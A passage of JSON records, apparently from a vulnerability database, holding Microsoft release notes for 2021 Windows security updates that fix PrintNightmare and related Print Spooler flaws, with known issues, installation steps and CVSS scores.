["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004953", "href": "https://support.microsoft.com/en-us/help/5004953", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:15", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>). \n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003697](<https://support.microsoft.com/help/5003697>) (released previous June 8, 2021) and addresses the following issues:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004956>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004956](<https://download.microsoft.com/download/e/f/5/ef50021e-60a9-47da-be60-b2687db452d3/5004956.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 7, 2021\u2014KB5004956 (Monthly Rollup) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004956", "href": "https://support.microsoft.com/en-us/help/5004956", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nWSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue in which a driver might not install if the driver is signed with more than one code sign signatures.\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006715](<https://support.microsoft.com/help/5006715>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5007246](<https://support.microsoft.com/help/5007246>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006715](<https://support.microsoft.com/help/5006715>). If after installing [KB5006715](<https://support.microsoft.com/help/5006715>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, we strongly recommend that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005563](<https://support.microsoft.com/help/5005563>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005618>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005618](<https://download.microsoft.com/download/6/f/0/6f091713-20f2-44a1-b92f-1b97061a9ac9/5005618.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005618 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005618", "href": "https://support.microsoft.com/en-us/help/5005618", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue in which a driver might not install if the driver is signed with more than one code sign signatures.\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed **in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\n * If you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006728](<https://support.microsoft.com/help/5006728>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5007233](<https://support.microsoft.com/help/5007233>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006728](<https://support.microsoft.com/help/5006728>). If after installing [KB5006728](<https://support.microsoft.com/help/5006728>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005563](<https://support.microsoft.com/help/5005563>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005615>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005615](<https://download.microsoft.com/download/9/0/1/9011f90e-86fb-404d-9847-0c430ac902ff/5005615.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005615 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005615", "href": "https://support.microsoft.com/en-us/help/5005615", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:30", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005090](<https://support.microsoft.com/help/5005090>) (released August 10, 2021) and addresses the following issues:\n\n * Addresses an issue in which a driver might not install if the driver is signed with more than one code sign signatures.\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006736](<https://support.microsoft.com/help/5006736>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007263](<https://support.microsoft.com/help/5007263>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006736](<https://support.microsoft.com/help/5006736>). If after installing [KB5006736](<https://support.microsoft.com/help/5006736>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update](<https://www.microsoft.com/cloud-platform/extended-security-updates>) (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005606>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005606](<https://download.microsoft.com/download/1/4/7/147d3470-0e5e-48f9-888f-61e2094f4921/5005606.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005606 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005606", "href": "https://support.microsoft.com/en-us/help/5005606", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 